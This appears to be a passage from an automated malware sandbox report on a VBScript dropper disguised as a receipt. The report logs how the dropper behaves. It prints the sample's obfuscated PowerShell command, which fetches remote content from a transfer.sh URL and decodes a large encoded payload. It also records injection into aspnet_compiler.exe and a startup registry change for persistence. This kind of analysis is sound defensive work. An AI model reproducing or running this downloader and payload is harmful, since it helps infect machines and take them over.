%9-X-3b'.Replace('%','2').Replace('!','4').Replace('
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/ucAlHz/FGTEFRH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20210914Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ruruistl.ndu.ps1Jump to behavior
Source: classification engineClassification label: mal100.troj.evad.winVBS@10/11@23/3
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{401b59fa-a7f2-4468-a03b-04e3bc489e18}
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\18-ITEMS-RECEIPT.vbs'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functionsShow sources
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POwerSheLL $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/ucAlHz/FGTEFRH-Htxt", "0", "true");

Boot Survival:

barindex
Creates an undocumented autostart registry key Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
